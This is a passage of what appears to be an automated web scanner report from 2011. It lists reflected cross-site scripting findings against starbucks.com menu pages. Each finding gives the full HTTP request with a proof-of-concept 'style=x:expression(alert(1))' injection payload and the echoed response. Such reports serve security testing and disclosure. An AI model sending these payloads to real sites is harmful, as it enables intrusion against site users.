Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:12 GMT
Connection: close
Content-Length: 41158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style="x:expression(alert(1))"e5e65ed367b=1"/>
...[SNIP]...

2.259. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3953"style="x:expression(alert(1))"8dd8c6a876f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style%3d"x%3aexpression(alert(1))"8dd8c6a876f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:39 GMT
Connection: close
Content-Length: 42959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin?b3953"style="x:expression(alert(1))"8dd8c6a876f=1"/>
...[SNIP]...

2.260. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71082"style="x:expression(alert(1))"22e1f1319e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style%3d"x%3aexpression(alert(1))"22e1f1319e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:18 GMT
Connection: close
Content-Length: 42422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin?71082"style="x:expression(alert(1))"22e1f1319e2=1"/>
...[SNIP]...

2.261. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/starbucks-perfect-oatmeal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9099b"style="x:expression(alert(1))"fe560f2ff1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style%3d"x%3aexpression(alert(1))"fe560f2ff1f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:18 GMT
Connection: close
Content-Length: 41848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal?9099b"style="x:expression(alert(1))"fe560f2ff1f=1"/>
...[SNIP]...

2.262. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a962"style%3d"x%3aexpression(alert(1))"b0910c44384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a962"style="x:expression(alert(1))"b0910c44384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style%3d"x%3aexpression(alert(1))"b0910c44384=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:43:52 GMT
Connection: close
Content-Length: 42550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich?6a962"style="x:expression(alert(1))"b0910c44384=1"/>
...[SNIP]...

2.263. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/caramel-macchiato-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df808"style%3d"x%3aexpression(alert(1))"d48af3670c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df808"style="x:expression(alert(1))"d48af3670c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style%3d"x%3aexpression(alert(1))"d48af3670c3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:49 GMT
Connection: close
Content-Length: 38909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream?df808"style="x:expression(alert(1))"d48af3670c3=1"/>
...[SNIP]...

2.264. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/coffee-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4981d"style%3d"x%3aexpression(alert(1))"713a0269255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4981d"style="x:expression(alert(1))"713a0269255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/coffee-ice-cream?4981d"style%3d"x%3aexpression(alert(1))"713a0269255=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:17 GMT
Connection: close
Content-Length: 38702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream?4981d"style="x:expression(alert(1))"713a0269255=1"/>
...[SNIP]...

2.265. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/java-chip-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9c8a"style="x:expression(alert(1))"a6fb88be708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:21 GMT
Connection: close
Content-Length: 38920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style="x:expression(alert(1))"a6fb88be708=1"/>
...[SNIP]...

2.266. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/mocha-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 257c5"style%3d"x%3aexpression(alert(1))"1c951768a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 257c5"style="x:expression(alert(1))"1c951768a35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style%3d"x%3aexpression(alert(1))"1c951768a35=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:07 GMT
Connection: close
Content-Length: 38836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style="x:expression(alert(1))"1c951768a35=1"/>
...[SNIP]...

2.267. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/peppermint-mocha-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e9f1"style="x:expression(alert(1))"4d62ee870d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:37 GMT
Connection: close
Content-Length: 38833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style="x:expression(alert(1))"4d62ee870d0=1"/>
...[SNIP]...

2.268. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/signature-hot-chocolate-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0a4d"style="x:expression(alert(1))"9e96fe99df4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/signature-hot-chocolate-ice-cream?f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:25 GMT
Connection: close
Content-Length: 38968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream?f0a4d"style="x:expression(alert(1))"9e96fe99df4=1"/>
...[SNIP]...

2.269. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d87ac"style%3d"x%3aexpression(alert(1))"de1edf0e094 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d87ac"style="x:expression(alert(1))"de1edf0e094 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream?d87ac"style%3d"x%3aexpression(alert(1))"de1edf0e094=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:34 GMT
Connection: close
Content-Length: 39107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream?d87ac"style="x:expression(alert(1))"de1edf0e094=1"/>
...[SNIP]...

2.270. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a1e"style%3d"x%3aexpression(alert(1))"4551818f1b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3a1e"style="x:expression(alert(1))"4551818f1b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream?e3a1e"style%3d"x%3aexpression(alert(1))"4551818f1b7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:31 GMT
Connection: close
Content-Length: 38897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream?e3a1e"style="x:expression(alert(1))"4551818f1b7=1"/>
...[SNIP]...

2.271. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/farmers-market-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a321"style%3d"x%3aexpression(alert(1))"41fb35d7151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a321"style="x:expression(alert(1))"41fb35d7151 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/farmers-market-salad?1a321"style%3d"x%3aexpression(alert(1))"41fb35d7151=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:03 GMT
Connection: close
Content-Length: 41349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/farmers-market-salad?1a321"style="x:expression(alert(1))"41fb35d7151=1"/>
...[SNIP]...

2.272. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/fruit-cup

Issue detail

